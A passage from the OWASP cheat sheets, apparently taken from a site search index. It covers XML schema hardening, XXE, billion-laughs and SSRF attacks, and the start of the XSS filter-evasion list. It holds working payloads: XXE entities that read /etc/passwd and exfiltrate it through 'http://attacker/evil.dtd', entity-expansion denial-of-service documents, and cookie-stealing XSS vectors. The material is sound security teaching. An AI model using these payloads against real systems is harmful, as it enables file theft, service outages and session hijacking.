<xs:element name=\"month\">\n<xs:simpleType>\n<xs:restriction base=\"xs:string\">\n<xs:enumeration value=\"January\"/>\n<xs:enumeration value=\"February\"/>\n<xs:enumeration value=\"March\"/>\n<xs:enumeration value=\"April\"/>\n<xs:enumeration value=\"May\"/>\n<xs:enumeration value=\"June\"/>\n<xs:enumeration value=\"July\"/>\n<xs:enumeration value=\"August\"/>\n<xs:enumeration value=\"September\"/>\n<xs:enumeration value=\"October\"/>\n<xs:enumeration value=\"November\"/>\n<xs:enumeration value=\"December\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

By limiting the month element's value to any of the previous values, the application will not be manipulating random strings.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#ranges","title":"Ranges","text":"

Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:

<xs:element name=\"name\">\n<xs:simpleType>\n<xs:restriction base=\"xs:string\">\n<xs:minLength value=\"3\"/>\n<xs:maxLength value=\"256\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:

<xs:element name=\"name\">\n<xs:simpleType>\n<xs:restriction base=\"xs:string\">\n<xs:length value=\"8\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#patterns","title":"Patterns","text":"

Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:

<xs:element name=\"SSN\">\n<xs:simpleType>\n<xs:restriction base=\"xs:token\">\n<xs:pattern value=\"[0-9]{3}-[0-9]{2}-[0-9]{4}\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

Only numbers between 000-00-0000 and 999-99-9999 will be allowed as values for a SSN.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#assertions","title":"Assertions","text":"

Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable $value can be used to reference the contents of the value being analyzed. The Divide by Zero section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:

<xs:element name=\"denominator\">\n<xs:simpleType>\n<xs:restriction base=\"xs:integer\">\n<xs:assertion test=\"$value != 0\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

The assertion guarantees that the denominator will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#occurrences","title":"Occurrences","text":"

The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: minOccurs and maxOccurs. The default value for both the minOccurs and the maxOccurs attributes is 1, but certain elements may require other values. For instance, if a value is optional, it could contain a minOccurs of 0, and if there is no limit on the maximum amount, it could contain a maxOccurs of unbounded, as in the following example:

<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n<xs:element name=\"operation\">\n<xs:complexType>\n<xs:sequence>\n<xs:element name=\"buy\" maxOccurs=\"unbounded\">\n<xs:complexType>\n<xs:all>\n<xs:element name=\"id\" type=\"xs:integer\"/>\n<xs:element name=\"price\" type=\"xs:decimal\"/>\n<xs:element name=\"quantity\" type=\"xs:integer\"/>\n</xs:all>\n</xs:complexType>\n</xs:element>\n</xs:complexType>\n</xs:element>\n</xs:schema>\n

The previous schema includes a root element named operation, which can contain an unlimited (unbounded) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#jumbo-payloads","title":"Jumbo Payloads","text":"

Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#traditional-jumbo-payloads","title":"Traditional Jumbo Payloads","text":"

There are two primary methods to make a document larger than normal:

In most cases, the overall result will be a huge document. This is a short example of what this looks like:

<SOAPENV:ENVELOPE XMLNS:SOAPENV=\"HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/\"\nXMLNS:EXT=\"HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL\">\n<SOAPENV:HEADER LARGENAME1=\"LARGEVALUE\"\nLARGENAME2=\"LARGEVALUE2\"\nLARGENAME3=\"LARGEVALUE3\" \u2026>\n...\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#small-jumbo-payloads","title":"\"Small\" Jumbo Payloads","text":"

The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:

<?xml version=\"1.0\"?>\n<!DOCTYPE root [\n <!ENTITY file SYSTEM \"http://attacker/huge.xml\" >\n]>\n<root>&file;</root>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#schema-poisoning","title":"Schema Poisoning","text":"

When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#local-schema-poisoning","title":"Local Schema Poisoning","text":"

Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#embedded-schema","title":"Embedded Schema","text":"

The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :

<?xml version=\"1.0\"?>\n<!DOCTYPE note [\n <!ELEMENT note (to,from,heading,body)>\n<!ELEMENT to (#PCDATA)>\n<!ELEMENT from (#PCDATA)>\n<!ELEMENT heading (#PCDATA)>\n<!ELEMENT body (#PCDATA)>\n]>\n<note>\n<to>Tove</to>\n<from>Jani</from>\n<heading>Reminder</heading>\n<body>Don't forget me this weekend</body>\n</note>\n

All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contain a way to check the embedded schema integrity to be used safely. Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#incorrect-permissions","title":"Incorrect Permissions","text":"

You can often circumvent the risk of using remotely tampered versions by processing a local schema.

<!DOCTYPE note SYSTEM \"note.dtd\">\n<note>\n<to>Tove</to>\n<from>Jani</from>\n<heading>Reminder</heading>\n<body>Don't forget me this weekend</body>\n</note>\n

However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:

-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd\n

The permissions set on name.dtd allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#remote-schema-poisoning","title":"Remote Schema Poisoning","text":"

Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network's traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#man-in-the-middle-mitm-attack","title":"Man-in-the-Middle (MitM) Attack","text":"

When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:

<!DOCTYPE note SYSTEM \"http://example.com/note.dtd\">\n<note>\n<to>Tove</to>\n<from>Jani</from>\n<heading>Reminder</heading>\n<body>Don't forget me this weekend</body>\n</note>\n

The remote file note.dtd could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#dns-cache-poisoning","title":"DNS-Cache Poisoning","text":"

Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.

The previous example referenced the host example.com using an unencrypted protocol.

When switching to HTTPS, the location of the remote schema will look like https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:

$\u00a0host\u00a0example.com\nexample.com\u00a0has\u00a0address\u00a01.1.1.1\n

If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker 2.2.2.2:

$\u00a0host\u00a0example.com\nexample.com\u00a0has\u00a0address\u00a02.2.2.2\n

When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#evil-employee-attack","title":"Evil Employee Attack","text":"

When third parties host and define schemas, the contents are not under the control of the schemas' users. Any modifications introduced by a malicious employee-or an external attacker in control of these files-could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xml-entity-expansion","title":"XML Entity Expansion","text":"

If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#sample-vulnerable-java-implementations","title":"Sample Vulnerable Java Implementations","text":"

Using the DTD capabilities of referencing local or remote files it is possible to affect the confidentiality. In addition, it is also possible to affect the availability of the resources if no proper restrictions have been set for the entities expansion. Consider the following example code of an XXE.

Sample XML:

<!DOCTYPE contacts SYSTEM \"contacts.dtd\">\n<contacts>\n<contact>\n<firstname>John</firstname>\n<lastname>&xxe;</lastname>\n</contact>\n</contacts>\n

Sample DTD:

<!ELEMENT contacts (contact*)>\n<!ELEMENT contact (firstname,lastname)>\n<!ELEMENT firstname (#PCDATA)>\n<!ELEMENT lastname ANY>\n<!ENTITY xxe SYSTEM \"/etc/passwd\">\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-dom","title":"XXE using DOM","text":"
import java.io.IOException;\nimport javax.xml.parsers.DocumentBuilder;\nimport javax.xml.parsers.DocumentBuilderFactory;\nimport javax.xml.parsers.ParserConfigurationException;\nimport org.xml.sax.InputSource;\nimport org.w3c.dom.Document;\nimport org.w3c.dom.Element;\nimport org.w3c.dom.Node;\nimport org.w3c.dom.NodeList;\n\npublic class parseDocument {\npublic static void main(String[] args) {\ntry {\nDocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();\nDocumentBuilder builder = factory.newDocumentBuilder();\nDocument doc = builder.parse(new InputSource(\"contacts.xml\"));\nNodeList nodeList = doc.getElementsByTagName(\"contact\");\nfor (int s = 0; s < nodeList.getLength(); s++) {\nNode firstNode = nodeList.item(s);\nif (firstNode.getNodeType() == Node.ELEMENT_NODE) {\nElement firstElement = (Element) firstNode;\nNodeList firstNameElementList = firstElement.getElementsByTagName(\"firstname\");\nElement firstNameElement = (Element) firstNameElementList.item(0);\nNodeList firstName = firstNameElement.getChildNodes();\nSystem.out.println(\"First Name: \"  + ((Node) firstName.item(0)).getNodeValue());\nNodeList lastNameElementList = firstElement.getElementsByTagName(\"lastname\");\nElement lastNameElement = (Element) lastNameElementList.item(0);\nNodeList lastName = lastNameElement.getChildNodes();\nSystem.out.println(\"Last Name: \" + ((Node) lastName.item(0)).getNodeValue());\n}\n}\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n}\n

The previous code produces the following output:

$ javac parseDocument.java ; java parseDocument\nFirst Name: John\nLast Name: ### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-dom4j","title":"XXE using DOM4J","text":"
import org.dom4j.Document;\nimport org.dom4j.DocumentException;\nimport org.dom4j.io.SAXReader;\nimport org.dom4j.io.OutputFormat;\nimport org.dom4j.io.XMLWriter;\n\npublic class test1 {\npublic static void main(String[] args) {\nDocument document = null;\ntry {\nSAXReader reader = new SAXReader();\ndocument = reader.read(\"contacts.xml\");\n} catch (Exception e) {\ne.printStackTrace();\n}\nOutputFormat format = OutputFormat.createPrettyPrint();\ntry {\nXMLWriter writer = new XMLWriter( System.out, format );\nwriter.write( document );\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n}\n

The previous code produces the following output:

$ java test1\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE contacts SYSTEM \"contacts.dtd\">\n\n<contacts>\n <contact>\n  <firstname>John</firstname>\n  <lastname>### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-sax","title":"XXE using SAX","text":"
import java.io.IOException;\nimport javax.xml.parsers.SAXParser;\nimport javax.xml.parsers.SAXParserFactory;\nimport org.xml.sax.SAXException;\nimport org.xml.sax.helpers.DefaultHandler;\n\npublic class parseDocument extends DefaultHandler {\npublic static void main(String[] args) {\nnew parseDocument();\n}\npublic parseDocument() {\ntry {\nSAXParserFactory factory = SAXParserFactory.newInstance();\nSAXParser parser = factory.newSAXParser();\nparser.parse(\"contacts.xml\", this);\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n@Override\npublic void characters(char[] ac, int i, int j) throws SAXException {\nString tmpValue = new String(ac, i, j);\nSystem.out.println(tmpValue);\n}\n}\n

The previous code produces the following output:

$ java parseDocument\nJohn\n#### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-stax","title":"XXE using StAX","text":"
import javax.xml.parsers.SAXParserFactory;\nimport javax.xml.stream.XMLStreamReader;\nimport javax.xml.stream.XMLInputFactory;\nimport java.io.File;\nimport java.io.FileReader;\nimport java.io.FileInputStream;\n\npublic class parseDocument {\npublic static void main(String[] args) {\ntry {\nXMLInputFactory xmlif = XMLInputFactory.newInstance();\nFileReader fr = new FileReader(\"contacts.xml\");\nFile file = new File(\"contacts.xml\");\nXMLStreamReader xmlfer = xmlif.createXMLStreamReader(\"contacts.xml\",\nnew FileInputStream(file));\nint eventType = xmlfer.getEventType();\nwhile (xmlfer.hasNext()) {\neventType = xmlfer.next();\nif(xmlfer.hasText()){\nSystem.out.print(xmlfer.getText());\n}\n}\nfr.close();\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n}\n

The previous code produces the following output:

$ java parseDocument\n<!DOCTYPE contacts SYSTEM \"contacts.dtd\">John### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#recursive-entity-reference","title":"Recursive Entity Reference","text":"

When the definition of an element A is another element B, and that element B is defined as element A, that schema describes a circular reference between elements:

<!DOCTYPE A [\n <!ELEMENT A ANY>\n<!ENTITY A \"<A>&B;</A>\">\n <!ENTITY B \"&A;\">\n]>\n<A>&A;</A>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#quadratic-blowup","title":"Quadratic Blowup","text":"

Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)).

The result of the following attack will be 100,000 x 100,000 characters in memory.

<!DOCTYPE root [\n <!ELEMENT root ANY>\n<!ENTITY A \"AAAAA...(a 100.000 A's)...AAAAA\">\n]>\n<root>&A;&A;&A;&A;...(a 100.000 &A;'s)...&A;&A;&A;&A;&A;</root>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#billion-laughs","title":"Billion Laughs","text":"

When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:

<!DOCTYPE root [\n <!ELEMENT root ANY>\n<!ENTITY LOL \"LOL\">\n<!ENTITY LOL1 \"&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;\">\n<!ENTITY LOL2 \"&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;\">\n<!ENTITY LOL3 \"&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;\">\n<!ENTITY LOL4 \"&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;\">\n<!ENTITY LOL5 \"&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;\">\n<!ENTITY LOL6 \"&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;\">\n<!ENTITY LOL7 \"&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;\">\n<!ENTITY LOL8 \"&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;\">\n<!ENTITY LOL9 \"&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;\">\n]>\n<root>&LOL9;</root>\n

The entity LOL9 will be resolved as the 10 entities defined in LOL8; then each of these entities will be resolved in LOL7 and so on. Finally, the CPU and/or memory will be affected by parsing the 3 x 10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash.

The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages.

The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:

<?XML VERSION=\"1.0\" ENCODING=\"UTF-8\"?>\n<!DOCTYPE SOAP-ENV:ENVELOPE [\n <!ELEMENT SOAP-ENV:ENVELOPE ANY>\n<!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED>\n<!ENTITY LOL \"LOL\">\n<!ENTITY LOL1 \"&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;\">\n<!ENTITY LOL2 \"&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;\">\n<!ENTITY LOL3 \"&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;\">\n<!ENTITY LOL4 \"&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;\">\n<!ENTITY LOL5 \"&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;\">\n<!ENTITY LOL6 \"&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;\">\n<!ENTITY LOL7 \"&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;\">\n<!ENTITY LOL8 \"&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;\">\n<!ENTITY LOL9 \"&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;\">\n]>\n<SOAP:ENVELOPE ENTITYREFERENCE=\"&LOL9;\"\nXMLNS:SOAP=\"HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/\">\n<SOAP:BODY>\n<KEYWORD XMLNS=\"URN:PARASOFT:WS:STORE\">FOO</KEYWORD>\n</SOAP:BODY>\n</SOAP:ENVELOPE>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#reflected-file-retrieval","title":"Reflected File Retrieval","text":"

Consider the following example code of an XXE:

<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n<!DOCTYPE root [\n <!ELEMENT includeme ANY>\n<!ENTITY xxe SYSTEM \"/etc/passwd\">\n]>\n<root>&xxe;</root>\n

The previous XML defines an entity named xxe, which is in fact the contents of /etc/passwd, which will be expanded within the includeme tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#server-side-request-forgery","title":"Server Side Request Forgery","text":"

Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#external-dns-resolution","title":"External DNS Resolution","text":"

Sometimes is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. This is one of the simplest forms of SSRF, but requires the attacker to analyze the DNS traffic. Burp has a plugin that checks for this attack.

<!DOCTYPE m PUBLIC \"-//B/A/EN\" \"http://checkforthisspecificdomain.example.com\">\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#external-connection","title":"External Connection","text":"

Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE root [\n <!ENTITY % xxe SYSTEM \"http://attacker/evil.dtd\">\n%xxe;\n]>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#file-retrieval-with-parameter-entities","title":"File Retrieval with Parameter Entities","text":"

Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:

<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!DOCTYPE root [\n <!ENTITY % file SYSTEM \"file:///etc/passwd\">\n<!ENTITY % dtd SYSTEM \"http://attacker/evil.dtd\">\n%dtd;\n]>\n<root>&send;</root>\n

Here the DTD defines two external parameter entities: file loads a local file, and dtd which loads a remote DTD. The remote DTD should contain something like this:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!ENTITY % all \"<!ENTITY send SYSTEM 'http://example.com/?%file;'>\">\n%all;\n

The second DTD causes the system to send the contents of the file back to the attacker's server as a parameter of the URL.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#port-scanning","title":"Port Scanning","text":"

The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:

1) Complete Disclosure: The simplest and most unusual scenario, with complete disclosure you can clearly see what's going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.

2) Error-based: If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection:

java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80\n at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)\n at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)\n

3) Timeout-based: Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.

4) Time-based: Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#brute-forcing","title":"Brute Forcing","text":"

Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the username and password as part of the URI scheme (http, ftp, etc). For example the following :

<!DOCTYPE root [\n <!ENTITY user SYSTEM \"http://username:password@example.com:8080\">\n]>\n<root>&user;</root>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html","title":"XSS Filter Evasion Cheat Sheet","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing. The initial contents of this article were donated to OWASP by RSnake, from his seminal XSS Cheat Sheet, which was at: http://ha.ckers.org/xss.html. That site now redirects to its new home here, where we plan to maintain and enhance it. The very first OWASP Prevention Cheat Sheet, the Cross Site Scripting Prevention Cheat Sheet, was inspired by RSnake's XSS Cheat Sheet, so we can thank RSnake for our inspiration. We wanted to create short, simple guidelines that developers could follow to prevent XSS, rather than simply telling developers to build apps that could protect against all the fancy tricks specified in rather complex attack cheat sheet, and so the OWASP Cheat Sheet Series was born.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#tests","title":"Tests","text":"

This cheat sheet lists a series of XSS attacks that can be used to bypass certain XSS defensive filters. Please note that input filtering is an incomplete defense for XSS which these tests can be used to illustrate.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#basic-xss-test-without-filter-evasion","title":"Basic XSS Test Without Filter Evasion","text":"

This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):

<SCRIPT SRC=https://cdn.jsdelivr.net/gh/Moksh45/host-xss.rocks/index.js></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xss-locator-polygot","title":"XSS Locator (Polygot)","text":"

The following is a \"polygot test XSS payload.\" This test will execute in multiple contexts including html, script string, js and URL. Thank you to Gareth Heyes for this contribution.

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#malformed-a-tags","title":"Malformed A Tags","text":"

Skip the HREF attribute and get to the meat of the XXS... Submitted by David Cross \\~ Verified on Chrome

\\<a onmouseover=\"alert(document.cookie)\"\\>xxs link\\</a\\>

or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.

\\<a onmouseover=alert(document.cookie)\\>xxs link\\</a\\>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#malformed-img-tags","title":"Malformed IMG Tags","text":"

Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tags:

<IMG\u00a0\"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"\\>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#fromcharcode","title":"fromCharCode","text":"

If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#default-src-tag-to-get-past-filters-that-check-src-domain","title":"Default SRC Tag to Get Past Filters that Check SRC Domain","text":"

This will bypass most SRC domain filters. Inserting JavaScript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted like onblur, onclick giving you an extensive amount of variations for many injections listed here. Submitted by David Cross .

Edited by Abdullah Hussam(@Abdulahhusam).

<IMG SRC=# onmouseover=\"alert('xxs')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#default-src-tag-by-leaving-it-empty","title":"Default SRC Tag by Leaving it Empty","text":"

<IMG SRC= onmouseover=\"alert('xxs')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#default-src-tag-by-leaving-it-out-entirely","title":"Default SRC Tag by Leaving it out Entirely","text":"

<IMG onmouseover=\"alert('xxs')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#on-error-alert","title":"On Error Alert","text":"

<IMG SRC=/ onerror=\"alert(String.fromCharCode(88,83,83))\"></img>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-onerror-and-javascript-alert-encode","title":"IMG onerror and JavaScript Alert Encode","text":"

<img src=x onerror=\"&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041\">

